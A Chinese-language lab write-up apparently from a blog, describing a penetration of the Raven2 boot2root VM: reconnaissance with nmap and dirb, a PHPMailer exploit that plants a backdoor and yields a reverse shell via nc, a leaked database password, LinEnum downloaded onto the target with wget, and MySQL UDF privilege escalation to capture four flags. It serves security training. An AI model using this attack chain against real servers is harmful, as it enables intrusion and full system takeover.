1. 实训目的
通过此次实验来学习对Raven2的渗透,(Raven:2是中级boot2root VM。有四个要捕获的标志。在多次破坏之后,Raven Security采取了额外的措施来加固其Web服务器,以防止黑客),找到四个flag,学习一些渗透的基础知识。
2. 实训原理
在虚拟机上使用kali做为攻击机,对靶机进行渗透,使用kali上自带的nmap工具扫描靶机的ip地址,接下来使用dirb爆破网站的文件目录,获得一些有用的信息,使用网站所有的漏洞进行利用,寻找所需要的flag,最后进行提权以此获得root权限
3. 实训环境
测试环境:VMware workstations14
渗透机:kali-linux2019,ip:192.168.0.103
测试机:Raven2,ip:192.1680.106
连接方式:网络配置都选用桥接模式
4. 实训步骤
一、信息收集
1.1查看kali的ip地址
![](https://img-blog.csdnimg.cn/20210901103813149.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_16,color_FFFFFF,t_70,g_se,x_16)
1.2使用arp-scan -l扫描靶机的ip
![](https://img-blog.csdnimg.cn/20210901103825237.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
1.3使用nmap扫描靶机开启的端口以及服务
![](https://img-blog.csdnimg.cn/20210901103849497.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_16,color_FFFFFF,t_70,g_se,x_16)
端口22开启的ssh可以进行爆破,80端口的http,可以在浏览器上访问
1.4浏览器上访问靶机的ip地址
![](https://img-blog.csdnimg.cn/20210901103858521.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
1.5使用dirb对网站的文件目录爆破,得到网站的相对路径
dirb是一个轻量级的目录爆破工具,可以用它来快速的对目录进行一个简单的探测
![](https://img-blog.csdnimg.cn/20210901103913358.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_15,color_FFFFFF,t_70,g_se,x_16)
1.5.1在浏览器访问http://192.168.0.106/vendor/
![](https://img-blog.csdnimg.cn/20210901103922512.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_10,color_FFFFFF,t_70,g_se,x_16)
1.5.2查看PATH目录下找到flag1
![](https://img-blog.csdnimg.cn/20210901103934608.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_11,color_FFFFFF,t_70,g_se,x_16)
1.5.3在examples目录下发现PHPMailer 邮件服务以及对应的版本(PHPMailer是一个用于发送电子邮件的PHP函数包)
![](https://img-blog.csdnimg.cn/20210901103943129.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_16,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/20210901103955909.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_16,color_FFFFFF,t_70,g_se,x_16)
二、漏洞利用(PHPMailer漏洞利用)(searchsploit phpmailer)
![](https://img-blog.csdnimg.cn/20210901104014538.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
2.1选用40974.py.使用cp命令将py文件复制到自己相应的目录里,并且使用vim编辑器打开
cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/
vim 40974.py
![](https://img-blog.csdnimg.cn/20210901104031160.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/20210901104037604.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
2.2运行python代码(python 40974.py)
![](https://img-blog.csdnimg.cn/20210901104056669.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_17,color_FFFFFF,t_70,g_se,x_16)
2.3浏览器访问http://192.168.0.106/contact.php生成后门文件
![](https://img-blog.csdnimg.cn/20210901104106121.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_16,color_FFFFFF,t_70,g_se,x_16)
2.4用nc开启监听并访问http://192.168.0.106/sky.php 获得一个低级的shell,并且用python获取pty得到交互式的shell
![](https://img-blog.csdnimg.cn/20210901104113115.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
2.5在var目录下全局搜索flag
![](https://img-blog.csdnimg.cn/2021090110411931.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
flag2.txt与链接flag3.png
2.6查看flag2
cd /var/www
cat flag2.txt
![](https://img-blog.csdnimg.cn/2021090110413089.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_15,color_FFFFFF,t_70,g_se,x_16)
2.7浏览器访问http://192.168.0.106/wordpress/wp-content/uploads/2018/11/flag3.png
![](https://img-blog.csdnimg.cn/20210901104139898.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
2.8查找数据库的账号密码
![](https://img-blog.csdnimg.cn/20210901104148349.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/20210901104153215.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_12,color_FFFFFF,t_70,g_se,x_16)
得到数据库账号:root ,数据库密码:R@v3nSecurity
三、权限提升并找flag4
3.1在kali终端下载枚举漏洞工具LinEnum
https://github.com/rebootuser/LinEnum
![](https://img-blog.csdnimg.cn/20210901104203364.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
3.2用python搭建一个简单的服务器来把文件下载到靶机里面
python -m http.server 6666-----文件内打开终端!!!!
![](https://img-blog.csdnimg.cn/2021090110421485.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_17,color_FFFFFF,t_70,g_se,x_16)
3.3 在靶机上使用wget下载
wget http://192.168.0.103:6666/LinEnum.sh
![](https://img-blog.csdnimg.cn/2021090110422281.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
3.5需要提权,chmod修改权限后,再./LinEnum.sh执行
![](https://img-blog.csdnimg.cn/20210901104246499.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_19,color_FFFFFF,t_70,g_se,x_16)
3.6要查找MySQL版本
![](https://img-blog.csdnimg.cn/20210901104300851.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
如果MySQL版本 <= 5.7.14,5.6.32,5.5.51就可以使用该漏洞提权,,此版本的MySQL容易受到UDF(用户定义函数)漏洞的攻击
![](https://img-blog.csdnimg.cn/20210901104312966.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
3.7漏洞利用(在kali终端)
![](https://img-blog.csdnimg.cn/20210901104324791.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/20210901104329671.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
3.8使用python模块创建服务器
python2 -m SimpleHTTPServer 8080
![](https://img-blog.csdnimg.cn/20210901104335941.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_16,color_FFFFFF,t_70,g_se,x_16)
3.9把文件ok.so利用服务器传输到靶机上(下面的ip为kali的IP)
![](https://img-blog.csdnimg.cn/202109011043424.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
3.10进入数据库--创建数据表--插入数据--新建存储函数
![](https://img-blog.csdnimg.cn/20210901104350243.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_11,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/20210901104400522.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_9,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/20210901104410561.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/20210901104419921.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5rWq5Lq65ZKW5ZKW,size_17,color_FFFFFF,t_70,g_se,x_16)
成功提权并且查看flag4.txt